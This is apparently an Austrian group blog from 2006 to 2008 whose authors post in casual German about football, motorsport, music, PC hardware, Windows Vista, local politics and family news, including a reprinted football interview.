ein jahr nach dem superbowl-sieg seines bruders peyton hat nun auch der kleine bruder alle nörgler und kritiker verstummen lassen.

für mich wars eine phantastische superbowl und ich freu mich schon auf nächste saison!!!

sunset  sTe  01.02.2008 19:18:42
Müllverbrennungsanlage Spittelau 16:45
i like that one  sTe  25.01.2008 02:10:37

"Wir haben im Interesse besserer Lesbarkeit auf die Schreibweise der weiblichen Form (z.B. JungunternehmerIn) verzichtet, legen jedoch Wert auf die Feststellung, dass das Internetportal http://www.jungewirtschaft.at weiblichen und männlichen Benutzern gleichermaßen gerecht wird."

 

dass gerade die wirtschaftskammer das praktiziert gibt noch hoffnung vor der kompletten vertrottelung durch die sogenannte emanzipation.

 

btw: fuhr heute hinter einem suv mit dem aufdruck eines puffs in herzogenburg: dessen namen "fixsie" ich zwar zugegebenermassen derb aber nicht ungenial finde... 

prosit 2008  sTe  03.01.2008 17:16:45
merry xmas 07  sTe  26.12.2007 19:31:57
@ loipersdorf  sTe  04.12.2007 15:34:46
kleiner tipp für komapatienten:  bully  04.11.2007 23:43:10


(aus) "Der Standard" vom 3. Nov. 2007

:)
smoking ace  sTe  29.10.2007 05:18:09

ich freu mich schon so auf das zahnlose rauchverbotsgesetz !!!

jeden tag in unzaehligen beiseln: gast1: "hallo, rauchen ist hier verboten" ;

gast2: "na und, wos wuest mochn..." ;
erfolg null - welcher auch;

die welt wird staunen ueber die oesterr. handhabung von prohibition...

 

feelosurvey  sTe  17.10.2007 02:21:39

ja wow, hat fast nur ein jahr gedauert aber jetzt gibts eine neue umfrage (linker had, runterscrollen -->bis zu "ACTUAL SURVEY" fuer alle dies berechtigterweise verdraengt haben);


aber obacht: kann uu nur mehr 2 tage relevant sein :)



mehr zum thema gibts unter: www.hickeraus.at

in Rainbows  sTe  13.10.2007 03:52:22

mit "In Rainbows" betreten Radiohead neue vermarktungspfade.

ab dem 10. Oktober ist die neue Platte als download über diese homepage erhältlich. so weit, so zeitgemäß. der clou: jeder bezahlt das, was ihm das album wert ist. auch ein kostenloser download ist möglich...
dadurch koennte auch eine denk- und diskussionsprozess über den wert von nichtdinglicher kunst ausgeloest werden. wie viel ist musik wert, die ich als download in 160 kBit/sek-qualität aus dem netz sauge? wird sie durch die form des erwerbs als kunstwerk entwertet? wird sie dadurch, dass mir Radiohead einen mündigkeitsvorschuss gewähren, aufgewertet? hat kunst überhaupt einen materiellen wert oder geht es nur um das ideelle?

ich bin gespannt ueber das ergebniss...die scheibe ist uebrigends erste sahne!!!

rechargin´ batteries  sTe  07.10.2007 02:31:07

goennte mir die ersten 3 "nichts-tu-tage" des jahres (der eine oder andere wartungs task liess sich nicht verhindern (grummel);
what i did for pleasure:

war absolut notwendig!
graffiti inversive  sTe  26.09.2007 01:56:15
oder "abgaskunst": leider sehr schnell vergaenglich...
O´zapft is!  romario11  24.09.2007 06:03:05
Zünftig woar er, der Wiesnbesuch, und sehr scheeh! Hätt ma ja nie dacht, dass mir das gefallen könnte, aber wenn gut 6.000 Durschtige beim erlösenden "O´ zapft is!" losplärren und die Musi ein Prosit der Gemütlichkeit aufspielt, das hat was.

Nächstes Jahr sicher wieder!
almost perfect workstation  sTe  13.09.2007 04:33:52

waren heute den ganzen tag in einem geilen schnittstudio, wo ich mir div modifications fuer meinen arbeitsplatz geholt habe: zb den tisch mit speziellem microfaser stoffueberzug tapezieren --> "spart" :) mousepad, und schaut einfach nur spitze aus:


_
PS: wer kennt den den kleinen suessen kerl auf dem preview monitor rechts, 2tes bild (hint: klickta auf bild)
Novak Djokovic  sTe  11.09.2007 19:14:49

endlich wieder mal ein ausnahmespieler dieses jahr auch in wien bei der BA-CA-Trophy.


witzig auch seine immitationen:
spinning the wheel  sTe  08.09.2007 01:24:46
in einer aeusserst waghalsigen mission der indeed! techniker wurden letzte woche 3 webcams auf dem Wiener Riesenrad zwecks Baufortschritt Dokumentation installiert. die aktuellen zeitraffervideos der an den achsen montierten cams sind oeffentlich zugaenglich. die unterhalb einer gondel angebrachte cam ist fernbedienbar und leider nur dem kunden vorbehalten.
bioshock  sTe  28.08.2007 20:12:12
so recommended...
copy that  sTe  22.08.2007 02:40:22


some things never change...

laut der berechnung ist "er" genau am tag vor meinem 147. geburtstag fertig :)

(natuerlich gings dann doch schneller...) 

EM euphorie  sTe  20.08.2007 02:34:40

oder wie schafft man sie nicht:
ORF schiesst direkt nach einem nicht unspannenden fussballspiel "vera-exklusiv" nach - allen, denen da keiner zamfaellt, kann man eh nicht helfen (sofern er sich fuer fussball interessiert und maennlich ist); grandiose sendungsplanung!!!
wenn ich mich entsinne, was ARD und ZDF vor der WM 2006 an berichterstattungen, qualifikationsspielen (nicht nur die eigenen) in die waagschale geworfen haben....ORF - wiedermal VOLL DANEBEN!!!
oder alles wird als kalkuel ob unserer fussballerischen schwaeche, feig und kommentarlos so geplant!!! - schliesslich waehrt "vera" am laengsten...

MotoGP meets Vienna  sTe  16.08.2007 02:31:59



heiss wars, laut wars, und ziemlich viele leute (gute 10.000); die strecke mit 500 meter viel zu kurz (kaum mehr als der 1. gang) - trotzdem wheelis und burnouts :)
beeindruckend auf jedenfall das interesse !!!

pics here und here
wienweb neu  sTe  08.08.2007 17:07:43
relaunched today: wienweb.at
In Deutschland ...  bully  07.08.2007 15:12:54
... geht´s wieder los!!!

Als kleine Einstimmung ein Interview mit Holger Stanislawski:

Herr Stanislawski, die nächste Zweitligasaison wird vielleicht die beste aller Zeiten. Auf welche Mannschaft freuen Sie sich am meisten?

In der Tat, das sind schon klangvolle Namen in Liga zwei. Gladbach, Lautern, 1860 oder Köln – da kommen echte Traditionsvereine mit sensationellen Fußballstadien auf uns zu, ich freue mich auf alle diese Spiele! Auch am Aachener Tivoli zu spielen ist immer etwas ganz Besonderes.

Die Konkurrenz ist riesig. Warum wird St. Pauli dennoch die Klasse halten?

Die Leistungsdichte unter den Spitzenteams der Liga ist extrem hoch, keine Frage. Ich glaube aber, dass es dahinter relativ ausgeglichen zugehen wird. Wir haben den großen Vorteil, dass wir über eine eingespielte und gut funktionierende Mannschaft verfügen. Wichtig wird sein, dass wir mit unseren Fans im Rücken die Heimstärke beibehalten, die uns auch im letzten Jahr so stark gemacht hat.

Hoffen Sie auf ein Straucheln der Großen?

Wenn die Großen uns unterschätzen und gegen uns Punkte lassen sollten, kann uns das natürlich nur Recht sein. Grundsätzlich schauen wir aber nur auf uns. Wenn wir unsere Leistung bringen, dann spielen wir auch eine erfolgreiche Saison.

Ihre beiden Neuzugänge Rene Schnitzler und Alexander Ludwig bringen nicht gerade Erfahrung ins Team. Ein Nachteil im Abstiegskampf?

Das glaube ich nicht. Wir haben hier eine sehr junge, ehrgeizige Truppe. Jeder einzelne Spieler will sich im Profifußball beweisen, darauf arbeiten wir seit Jahren hin. Außerdem ist es ja nicht so, dass wir nur unerfahrene Youngster im Team haben – Leute wie Stendel, Meggle oder jetzt auch Gunesch bringen durchaus Bundesliga-Erfahrung mit.

Ihre beiden Mitaufsteiger Hoffenheim und Wehen schicken sich an, mit großem finanziellen Aufwand die Bundesliga zu stürmen. Wünschen Sie sich ähnliche Verhältnisse auch für den FC St. Pauli?

Richtig ist: Wir haben einen der kleinsten Etats in der zweiten Liga. Bei uns gibt es nun mal keinen Mäzen im Hintergrund, der seine Millionen in den Club steckt. Die ganz großen Transfers können wir uns nicht leisten. Aber dafür verfügen wir über andere Qualitäten, wie z.B. eine homogene, gewachsene Truppe oder auch die ganze Atmosphäre im Umfeld. Welches Konzept sich letztlich durchsetzen wird, werden wir sehen.

Innerhalb des Vereins arbeiten auffällig viele ehemalige Profispieler. Ist diese familiäre Atmosphäre das Geheimnis ihres Erfolgs?

Absolut. Die Identifikation mit dem Verein ist für uns alle selbstverständlich. Dazu gehört auch ein vertrauensvoller Umgang mit allen Beteiligten. Ein ehrlicher Handschlag hat bei uns noch eine Bedeutung.

Wie stressig wird ihr Doppelleben als Trainer und Sportchef einer Profiabteilung?

Diese doppelte Tätigkeit bedeutet wirklich eine Menge Arbeit. Aber wir hätten uns nicht für diese Lösung entschieden, wenn der Stress für eine Person zu hoch wäre. Es gibt ja außerdem einen Haufen von Leuten, die mich in meiner Arbeit unterstützen.

Wie kompensieren Sie den Druck, der auf diesen Ämtern lastet?

Den Ausgleich bekomme ich zu Hause, das kann ich nur immer wieder betonen. Meine Frau ist in alle Angelegenheiten eingeweiht, ohne ihre Unterstützung könnte ich das alles nicht machen.

St. Paulis Finanz-Vize Andreas Wasilewski begründete die Entscheidung damit, dass eine Personalunion „finanziell sinnvoller“ sei. Sind sie damit einverstanden?

Natürlich, diese Entscheidung haben wir ja einvernehmlich getroffen. Wir haben unterschiedliche Alternativen geprüft und sind zusammen zu dem Entschluss gekommen, dass diese Lösung zurzeit die beste ist.

Wie sehr behindert der Stadionausbau den laufenden Spielbetrieb?

Das sehe ich überhaupt nicht als Problem. Natürlich freuen wir uns alle auf die neue Südtribüne, aber die Atmosphäre in der Rückrunde war ja am Millerntor auch ohne Südtribüne großartig. Wir waren das heimstärkste Team der Liga, das sagt doch eigentlich alles.

In der letzten Saison kam es im Vorstand immer wieder zu internen Querelen. Wie groß ist ihre Sehnsucht nach Ruhe im Verein?

Sehnsucht braucht da niemand zu haben, denn Ruhe haben wir ja jetzt. Natürlich war die Situation in der letzten Saison nicht ganz einfach, aber den Einfluss auf den sportlichen Bereich konnten wir ohnehin gering halten.

Sie haben die Mannschaft als Tabellenzwölfter der Regionalliga übernommen und bis zum Aufstieg geführt. Glauben Sie an Fußballmärchen und den direkten Durchmarsch in die Bundesliga?

Da muss man schon realistisch bleiben. Wir wollen im nächsten Jahr so erfolgreich wie möglich spielen und am Ende die Klasse halten. Aber nach der letzten Hinrunde doch noch aufzusteigen – das war schon sensationell! So gesehen sind wir ja bereits mitten in einem kleinen Fußballmärchen. Wir sind selbst gespannt, wie das zum Schluss ausgehen wird…

©11freunde

--------------------------------

Nachdem ja auch die Salzburger Austria mit zwei Siegen in die neue Saison gestartet ist (5:0 und 6:1), steht einer neuen spannenden Fussball-Saison nichts im Wege, denk ich mal.
Whiplash  romario11  06.07.2007 17:54:11
Bang your head against the stage
Like you never did before
Make it ring Make it bleed
Make it really sore
In a frenzied madness
with your leather and your spikes
Heads are bobbing all around
It´s hot as Hell tonight

Adrenaline starts to flow
You´re thrashing all around
Acting like a maniac
Whiplash

Mei woar des sche, wieder einmal das Hirn so richtig durchzuschütteln. Die Herren wissen, was die Fans wünschen - nur alte hadern bis maximal Black Album. 2,5 Stunden Show. Herrlich.
eurofighter  sTe  02.07.2007 06:21:09

let´s call this one "treffend" :)

was die gute alte "goldhaube" sich wohl denkt, in anbetracht der kommenden ueberqualifizierten protagonisten...zZZ...
FILMTIPP  bully  25.06.2007 16:48:50
As the front man of the Clash from 1977 onwards, Joe Strummer changed people´s lives forever. Four years after his death, his influence reaches out around the world, more strongly now than ever before. In "The Future Is Unwritten", from British film director Julien Temple, Joe Strummer is revealed not just as a legend or musician, but as a true communicator of our times. Drawing on both a shared punk history and the close personal friendship which developed over the last years of Joe´s life, Julien Temple´s film is a celebration of Joe Strummer - before, during and after The Clash.
free hugs  sTe  20.06.2007 03:15:45
WTCC Brno Review  sTe  19.06.2007 03:37:32

also ehrlich: wenn man nicht wuesste welch aufwand da betrieben wird, und man nicht den einblick hinter die kulissen haette ist so ein rennen eher eine recht faade gschicht...

man sieht 2 kurven - die sind geil (weil anschieben etc erlaubt, alle schrein, troeten...) und dann wartet man wieder gute 1,5 minuten wo genau GAR NIX passiert; wie langweilig muss da erst die formel 1 live sein?!?

fairerweise sollte man zugestehen dass bei einem WTCC renntag mehrere rennen abgehen, unter anderem auch eins mit eigenbau-getuneten serienwagen - welches wir wie alle bis auf das eine, worauf diese rieview gruendet, ausgelassen haben - (wir wollten alle heim nach den tagen);

es geht also meineserachtens primaer ums drumherum (party, campen, etc), welches bei der f1 sicher nicht zu toppen ist - wenngleich auch erstaunlich viele besucher bei der WTCC zu verzeichnen sind;

meine rennbesuche beschraenkten sich bis jetzt auf 2 motorrad weltmeisterschaftslaeufe (jetzt MotoGP) noch am legendaeren Salzburg Ring - das war lauter, spektakulaerer, und die leut beim drumherum warn erdiger :)

WTCC BRNO  sTe  13.06.2007 01:19:05

morgen gehts ab nach Brünn (genauer automotodrom) zum FIA WTCC rennen; leider arbeitenderweise, jedoch sollte am eigentlichen renntag (sonntag) alles fuer uns abgeschlossen sein - insofern koennts schon interessant werden und wir koennen unseren auftraggeber kraeftig anfeuern;

(eurosport uebertraegt die rennen um 11:45 und 15:15)

 

Austria Salzburg am Weg zurück  sTe  11.06.2007 16:50:33
0:1  sTe  01.06.2007 06:00:04

Hicke, was noch ;)

ganz toll war ja auch die kaum, bis nicht vorhandene nachberichterstattung unseres pleite senders - einzigartig !!!

alles totschweigen - keine diskussion - va mit unseren hoechst bissigen, intelligenten orf kommentatoren...

 

ps: ahh, jetzt versteh ichs!!! - redbull hat den darauffolgenden sendeplatz gemietet :) ... world stunts awards - ist natuerlich fuer einen oeffentlich/rechtlichen sender wichtiger als die EM im eigenen land.

First Rambo IV Feature Trailer - R-Rated !!!  sTe  22.05.2007 00:35:43
watch trailer
Austria Salzburg ist Meister  sTe  21.05.2007 04:10:25

die Salzburger Austria fixiert den meistertitel in der 2. Klasse Nord A und steigt somit in die 1. Klasse Nord auf.

 

btw: red bull salzburg ist auch meister...who cares... eine keimfreie meisterfeier powered by OE3 ... da schliesst sich der kreis,....ein waschmittelspot ist aufregender...

was uebelst aufstoesst war die violette fahne bei der uebergabe des meistertellers ,...verarschen koennts wen anderen...

it has landed  sTe  16.05.2007 20:55:30

 

alles neu macht der mai...
highspeed  sTe  11.05.2007 18:13:22



nach beinahe 4 jahren haben wir uns wieder mal neue arbeitsgeraete gegoennt: und ja, die sind schnell :)

 

die specs:

Cooler Master Stack RC-831 Midi Tower schwarz
Intel Core 2 Duo E6600 2.4GHZ (auf 3,15 overclocked)
Asus STRIKER EXTREME S775 NF680I-SL
DDR2 2048MB (2X1024) PC1066 Domination Series mit EPP
Point of View GeForce 8800 Ultra, 768MB GDDR3, 2x DVI, TV-out, PCIe
Western Digital Raptor 150GB SATA 1.5GB/S
LiteOn DVD Brenner S-ATA
Plextor DVD-Brenner PX-800A/T3
Ultron UCR 16in1 Intern
Corsair Modular Power Supply 620W
NH-U-12 Noctua Passivkühler mit 120mm Leisem Lüfter
Seagate Barracuda ES 500GB SATA-II

joost!  sTe  04.05.2007 01:37:39
teste gerade joost und bin schwer begeistert...

hierbei handelt es sich um iptv (fernsehn uebers internet) mit community features...

das angebot ist jetzt schon ziemlich umfassend da der Viacom-Konzern (Paramount, MTV,Comedy Central...) bereits mit an board ist.

habe noch genuegend beta-invitations zu vergeben, fuer die dies auch testen wollen...(PC und MAC)
drivemania 2007!  sTe  01.05.2007 14:00:36

indeed!´s groesste veranstaltung so far, war ein voller erfolg;
schweisstreibend (nicht nur wegen den temperaturen), wenig schlaf, und trotzdem wars ein positives erlebnis.
Filippinacht, Walpurgisnacht, Hexensabbat, Beltane  bully  30.04.2007 21:37:26

Um alte Erinnerungen aufzufrischen und den Ostösterreichern einen kleinen Einblick ins Salzburger Brauchtum zu verschaffen:

HEUT IS FILIPPINACHT!!!

einige Online-Zitate zur heutigen Nacht:

Der Apostel Philippus ist für die Ordnung zuständig. Deshalb tragen die jungen Burschen zur Schande der Leute in der Nacht zum 1. Mai alle nicht ordentlich aufgeräumten Gegenstände zusammen oder verstecken sie.

------------------

In der Nacht vom 30. April auf den 1. Mai fliegen die Hexen auf ihren Besen zum Blocksberg und feiern dort die Walpurgisnacht. Ein ausschweifendes Fest, bei dem der (auch anwesende) Teufel verehrt wird, Orgien gefeiert werden....

Soweit der Aberglaube.

Der wirkliche Ursprung dieses Festes ist mindestens genauso interessant wie solche Geschichten. Es handelt sich bei der Walpurgisnacht um das keltische Beltane-Fest.
Belenus war der keltische Gott des Lichts und das Beltane-Fest ist ein Fest der Fruchtbarkeit und des Lichts, die Sommerzeit wird begrüßt.


Die heilige Walpurga, eine engliche Benediktinernonne (8. Jhdt) war Äbtissin in Deutschland und an einem 1. Mai so um 870 wurde ein Teil ihrer Reliquen in die nach ihr benannte Kirche St. Walpurg gebracht. Seither wird diese Nacht als Walpurgis gefeiert und damit wieder einmal ein alter Brauch von der christlichen Kirche einverleibt.
Ein weiterer Name dieser Nacht ist Filippi-Nacht - und zu Filippi werden alle möglichen Sachen die nicht niet- und nagelfest sind verschleppt, also Streiche gespielt.

------------------

Mythologisch findet die Walpurgisnacht (ähnlich dem keltischen Fest Beltane) als Mondfest in der Nacht des ersten Vollmondes zwischen der Frühjahrstagundnachtgleiche und der Sommersonnenwende statt. Traditionell gilt jedoch die Nacht vom 30. April auf den 1. Mai als die Nacht, in der angeblich die Hexen insbesondere auf dem Blocksberg (eigentlich Brocken), aber auch an anderen erhöhten Orten ein großes Fest abhalten und auf die Ankunft des "gehörnten Gottes" warten. Im Rahmen der Christianisierung des Abendlandes wurde der Kult der Walpurgisnacht und verwandter Kulte (z. B. antiker Pan-Kult) im wahrsten Sinne des Wortes "ver-teufelt": aus dem gehörnten Gott, dem Symbol des Männlichen, welches sich in dieser Nacht mit dem Weiblichen vereinigt, wurde der Teufel.
kleines Fussball-Update...  bully  25.04.2007 19:43:08
... natürlich in Herzensangelegenheitsreihenfolge:

AUSTRIA SALZBURG:



Nachdem die Austria zuletzt Michaelbeuern und Schleedorf besiegt hat, steht dem Meistertitel in der 2. Klasse Nord nichts mehr im Wege. 6 Runden gehts noch, davon 4 Heimspiele; der Kaas is gess´n!!! bravo und forza viola!!!


ST. PAULI:



Puuh, noch 8 Spieltage (zumindest für die ersten 5) und es is so unglaublich eng da oben in der Regionalliga Nord... alles is möglich. Da der Mittelbau des deutschen Fussballs heuer im Sommer grundlegend verändert wird gilt wohl, entweder heuer aufsteigen oder dann lange nimma! All my best wishes to the Millerntor-Boys!!!


ALTONA 93:



Für Altona gilt leider selbiges wie für St. Pauli; entweder heuer aufsteigen oder dann lange nimma... und heuer wirds wohl leider wieder nichts. Seit einigen Jahren spielt der AFC konstant so um Platz 3 bis 5 in der Oberliga Nord, aber zum Aufstieg in die Regionalliga reichts halt heuer auch wieder nicht... trotzdem: ned aufgeben und weiterkämpfen!!!


SV GRÖDIG:



Die erste Saison in der Regionalliga West und die Burschen rund um Edi Glieder schlagen sich wirklich sehr wacker. Platz 6 derzeit, da kann man nicht meckern; Gratulation in die alte Heimat!
Aspern Revival  sTe  23.04.2007 00:43:10
mehr impressionen gibts hier
ps: das wars: das areal wird abgerissen, und wohnsilos entstehen...
mitten im 8ten  sTe  13.04.2007 01:56:19

aufrund eines grippalen infektes wollt ich mir diese sendung auch mal geben;

ohne viel tamtam zumachen (ad bully) ein kurz resume:  

UNLUSTIG und TIAF...

wenn sich das laenger als ein halbes jahr haelt (solang wernses halt probieren...)  frag ich mich wirklich...

 

bleibt zu hoffen dass "DIE LIEBE FAMILIE - NEXT GENERATION" mehr zu bieten hat...

frank´s  sTe  05.04.2007 03:55:31

erst war ich versucht das fuer einen late april joke abzuhandeln, mittlerweile glaub ich der typ meint das ernst: "Frank´s Authentic Autrian Energy Drink";

eigentlich zu tiaf um wahr zu sein - da hat wohl wer zum xten mal recht ganz gscheite einsager ghabt;

sollte das konzept wider erwarten aufgehen - respekt - mein verstaendniss wuerds  auf jedenfall uebersteigen...

the new one  sTe  28.03.2007 21:40:43
Hallo Welt  rriot  16.03.2007 21:59:04

wollte mich mal wieder melden. Hat ein wenig gedauert, bis ich alles perfekt auf der Reihe hatte. Erwachsene können schon mal ein wenig schwer von Begriff sein. Insgesamt muss ich Mami und Papa aber ein grosses Lob aussprechen. Habe eine rechte Gaudi mit ihnen. Und wer in Bachwinkl 2 das Sagen hat, haben sie inzwischen auch akzeptiert.

Bis bald
Jakob

 

link zu meiner gallery

what an ad!  sTe  07.03.2007 03:53:31
i am so a red maxl :)
new posting policy  sTe  01.03.2007 23:01:14

aufgrund des mehr als laestigen "blogspamming" (siehe feelocount) wurde feelo gezwungen einen zusaetzlichen security layer beim posten einzubauen.

es muss daher ab jetzt ein weiteres feld beim posten, die sogenannte security number (oder pin) - welche als bild klar erkennbar sein sollte, eingegeben werden. dadurch sollten die derzeit aktiven robots fuers erste ausgegrenzt sein - die next gen kann das bild sicher auch wieder interpretieren,...but we´ll fight back!

somit ist das posten ohne laestiges registrieren und einloggen nachwievor gegeben - ich hoffe wir koennen das noch lang so beibehalten.

bankueberfall  sTe  01.03.2007 09:52:19

"und das trauen sie sich auch noch zugeben / veröffentlichen ...
unglaublich..."
http://www.oe24.at/zeitung/oesterreich/chronik/article114781.ece
thx 2 bully

vista - aha...  sTe  13.02.2007 03:56:46
nach 2 wochen vista muss ich fast den plakativen satz "wow" = "mau" uebernehmen (daher auch das verschwommene bild);
fuer langzeit windows user zwar ein optischer staender on the first glance, aber im endeffekt faellt er einem recht schnell wieder auf die urspruengliche groesse zam.
die allseits angeprangerten ressourcen sind fuer mich kein thema, die wurden kommuniziert und verlangen keine utopischen massstaebe.
die treiber sind auch nicht das problem, sofern man nicht vorsintflutliche oder allzu exotische komponenten benutzt.

das hauptproblem ist das gutgemeinte "User Account Control" - wo man eigentlich ohne 10maliger bestaetigung nix installieren darf - selbst als admin (klar kann man den account auch freischalten, aber das ist ja in diesem fall erstmals und auch positiverweise nicht erwuenscht).
ohne dieses "User Account Control" funktionieren 100% meiner entwicklungsprogramme nicht - dh. abschalten des gutgemeinten controls.

das problem tritt jetzt aber auch bei "normal usern" mit "standard software" auf - die funktioniert meist einfach nicht ohne dass man die "User Account Control" abschaltet, und das wird alalong jeder machen.
ich hab dieses konzept auch bei linux nie verstanden!!! (persoenliche vermutung: keiner regt sich dort auf weils einfach "cool" ist, der master zu sein um etwas zu installieren, darum kraeht auch kein consumer danach)

my advice: der umzug bietet sich nur mit einem neuen rechner an, und jeder der warten kann soll mind. weitere 10 monate warten bis auch alle software hersteller ihre produkte adaptiert haben (muessen)...

ps: einen vorteil hatte der umzug: mein pc pimpin:
motherboard: ASUS P5B
speicher: 2gig corsair CL4 (cl4 is better than cl5)
CPU: INTEL Core 2 Duo E6600, 2,40GHz
tv-card: hauppauge 500 dual tuner
graphic: ATI X850XT (geborgt - auch einzige schwachstelle laut "windows experience level")

so much for the show off...but the performance really rocks :)
Exkommunikation  sTe  05.02.2007 05:33:57

eigentlich eine posse: "laun" (nicht zum wegkriegen der typ) versucht sich mit einer ebenso indistructable "österreichischen" erscheinung "lugner" anzulegen; es geht um das geplante sexual aerztezentrum in der "lugner city"

FACTS: die "lugner city" - das einkaufszentrum hat nur inetwa 1/3 des tatsaechlichen gebaeudekomplex inne); seit jeher waren dort auch 10 aerzte einquariert (ua. mein urologe) wie auch gynaekologen;

dieses aerztezentrum wurde jetzt erweitert und fuehrt jetzt auch abtreibungen durch;

dass der herr laun deppert is und das sofort anprangert war mir klar;
aber dass ein geistlicher seiner klasse (und das mein ich anerkennend obwohl ich ihn verachte) sich so uninformiert (dem lugner ghoert die city schon seit 2 jahren nimma) in die medien haut grenzt

an debilitaet!!!



2 dinge die mich daran ankotzen:
a) die einstellung der katholischen kirche
b) die gschissenen juenger die teilweise den guertel sperren!!! FUCK OFF!!! 

schladming 2007  sTe  31.01.2007 03:47:37



RESPECT!!! - i have to admit...

very cool slalom ... 

Kyrill  sTe  19.01.2007 04:24:36

21:00 niente...

22:00 auf einmal ein anzeichen, fenster hauts zu;

22:22 notha - kein luefterl - strange

ad  sTe  16.01.2007 22:20:30

iPhone  sTe  10.01.2007 04:08:55

endlich mal was erfreuliches in diesen tagen:

iPhone 

 

Bin ich froh, ...  bully  09.01.2007 17:10:51
... nicht rot gewählt zu haben.

unglaublich.......
ein jahr im neuen kleid  sTe  01.01.2007 19:51:32

as time flies...

rueckblickend hier noch einmal jedes erscheinungsbild, in dem sich feelo im letzten jahr gezeigt hat.
manchmal besser - manchmal weniger...



fuer anregungen bin ich auf jedenfall immer offen und dankbar.

ich wuensche allen ein frohes 2007 voll gesundheit und erfolg.
und dass sich die momentane topic frequenz erhoehen moege...was ja nicht grad schwer ist :)

 

xmas 06  sTe  23.12.2006 02:18:29
last 2006 project online  sTe  23.12.2006 02:16:21
relax and enjoy sha.
xDrive  sTe  23.11.2006 03:09:31

"Die Straße mag sich ändern. Die Freude am Fahren bleibt." unter diesem motto laeuft mein letztes projekt: BMW xDrive. Winterfest. testfahrtenanmeldungsmoeglichkeit (what a word) falls sich wer in einem der verfügbaren skigebiete zum jeweiligen zeitpunkt  befinden sollte...

(subsite by indeed!) 

say hello to jakob  sTe  21.11.2006 06:14:28

liebste glueckwuensche nach salzburg, und herzlichstes willkommen auf dieser welt, lieber neffe !!! nach dem ersten newsflash gehts allen praechtig - what a start !!! ich freu mich !!!

delivery  sTe  14.11.2006 06:28:30
wir verschieben ja beruflich doch einiges an waren, und da wir das ja nicht selbst erledigen wollen, nehmen wir, bzw unsere kunden, die dienste verschiedenster logistik unternehmen in anspruch.
die palette der dienstleister ist ja mittlerweile nicht mehr, oder gottseidank, allein auf die "post" beschraenkt - diese schneidet auch am allerschlechtesten ab (obwohl ich bei mir privat zu hause mehr als zufrieden bin - das haengt offensichtlich vom jeweilig zustaendigen postamt ab - ironisch ists nur, weil sich unsere firma im selben haus wie das relevante postamt befindet und wir kommen trotzdem, nach mehrmaligen interventionen auf keinen gruenen zweig - konstruktivitaet scheitert an "vurschrift".)
ein wirkliches ranking ist ja eigentlich auch nicht moeglich, da die anforderungen zu unterschiedlich sind. UPS / DPD kann man nicht mit "Blitzkurier" oder "Veloce" vergleichen.
trotzdem moechte ich, unserer ehrfahrung nach, die spezifische eigenheiten der jeweiligen unternehmen anfuehren:
  • UPS - sehr kompetent, very reliable, auch bei problemen auesserst professionell
  • DPD - generell ok, manchmal chaotisch (heutiges erlebnis folgt am ende)
  • Blitzkurier - das mittel der wahl um waren aller art schnellstmoeglich innerhalb Wiens zu verschieben. gewöhnungsbedürftig ist das erscheinungsbild mancher zusteller (inkl deren ausduenstung), dafuer kommens meist zu zweit (was sicher auch einen mir verborgenen grund hat), egal, es funktuniert und das ausnahmslos!
  • Veloce - die radfahrtruppe - ja duenstet auch aus, ist aber verstaendlich,...sind auch grossteils gut - trotzdem nicht so schnell (wo die fahrn weiss ich nicht, wie sie fahrn sehr wohl %@§$ !!!) - kosten im endeffekt MEHR als das vorhergenannte motorisierte pendant - bei weniger flexibilitaet, sprich tragkraft und reichweite.
  • die post lass ich mal aussen vor, da ja jeder seine eigenen erfahrungen hat, und das wie zuvor erwaehnt lokalitaets-spezifisch performt.
das heutige DPD erlebis recap:
suedlaendischer bote kommt rein - stellt das paket auf den tisch und rotzt : "hast du 400 euro" - nach 10 millisekunden nachdenkens, war mir klar er will mir vermitteln es handle sich um nachnahme - meine antwort: "nein, du?!?" - darauf er mit verschmitzen grinsen, ob des, seines empfinden nachs, gleichen erwiederten humors - "ok, ich lasse paket da, und komme morgen mit freunden! - du besser hast geld!"

 

so unkonventionell und menschlich diese unterhaltung, genauso schwierig ists leider auch einen posten bei DPD zu zu tracken...irgendwie klar ( va weil DPD prinzipell versucht die posten bei nachbarn zu deponieren, was ja mmn positiv ist, leider scheiterts oft eben an der ignoranz der nachbarn, aber das ist eine ander geschichte...)

autoquartett  sTe  02.11.2006 16:57:29
detomaso

 

dieses schmuckstueck stand heute in der naehe unseres office. sofort wurden erinnerungen an die mittelschule wach - an die unzaehligen pausen die wir mit autoquartett verbrachten. eins meiner lieblingsautos war eben der "DeTomaso Pantera". einfach eine geile rodel :)
HAPPY WELTSPARTAG!!!  bully  31.10.2006 19:47:25

especially to hons ;))

infos
:: bye bye, schummel-schumi...  bully  23.10.2006 15:14:18



hab mich zwar sehr oft über dich geärgert, dich ob deiner unfairness verflucht und verdammt, trotzdem oder gerade deshalb wünsch ich einen lange anhaltenden ruhestand und zwar OHNE comeback!!!

und zum abschied kann ich´s ja zugeben, ein paar beeindruckende rennen (wie zum beispiel auch gestern) waren schon dabei!!

PS: very worm congratz to fernando for the championship!!!!
Quarantine!  sTe  20.10.2006 04:07:02

das Varicella-Zoster-Virus hat nach 2 jahren kindergarten resistenz zugeschlagen. mir als "Schafplattern " , in Wien als "Feuchtblattern" und germanisch als "Windpocken" bekannt, hat bei Mia zugeschlagen; sie traegts "noch" mit fassung, mal schaun was der kleine bruder entgegenzusetzen hat...

*thumbs up*

Grundsicherung : Giesskannenprinzip oder Segen  sTe  16.10.2006 21:47:26

da der wahl thread schon eher langsam unuebersichtlich wird,

und sich das momentane thema wohl hauptsaechlich in diese richtung bewegt, kann hier weiterdiskutiert werden...

 

(um ev. verwirrung entgegenzuwirken: die betreffenden postings wurden hierher verschoben)

goodybag  sTe  10.10.2006 20:33:28

beim einem heutigen termin im BM-I haben wir nebenstehende goodies ueberreicht bekommen:

was hamm wir uns gefreut :)

 

bin schon gespannt was es am donnerstag im BM-AA gibt...

QUO VADIS?  sTe  01.10.2006 18:36:57
quo

aktueller stand (die presse)

autumn view  sTe  29.09.2006 15:08:15

so schoen kann der herbst sein...
KONFRONTATION ZUR WAHL 2006 pt 11  sTe  29.09.2006 15:06:28
sha.  sTe  28.09.2006 02:46:47

interimssite und zusatzbaustelle: sha.

(die weiterfuehrenden links sind die aufzuarbeitenden seiten) 

© www.tschuessel.at  bully  22.09.2006 14:46:01


KONFRONTATION ZUR WAHL 2006 pt 10  sTe  21.09.2006 19:41:57
KONFRONTATION ZUR WAHL 2006 pt 9  sTe  21.09.2006 19:41:42
Konfrontation zur Wahl 2006 - pt. 8   romario11  20.09.2006 18:19:31

Wo bleibt denn der neue thread? ich hab leider kein so schönes logo...

 

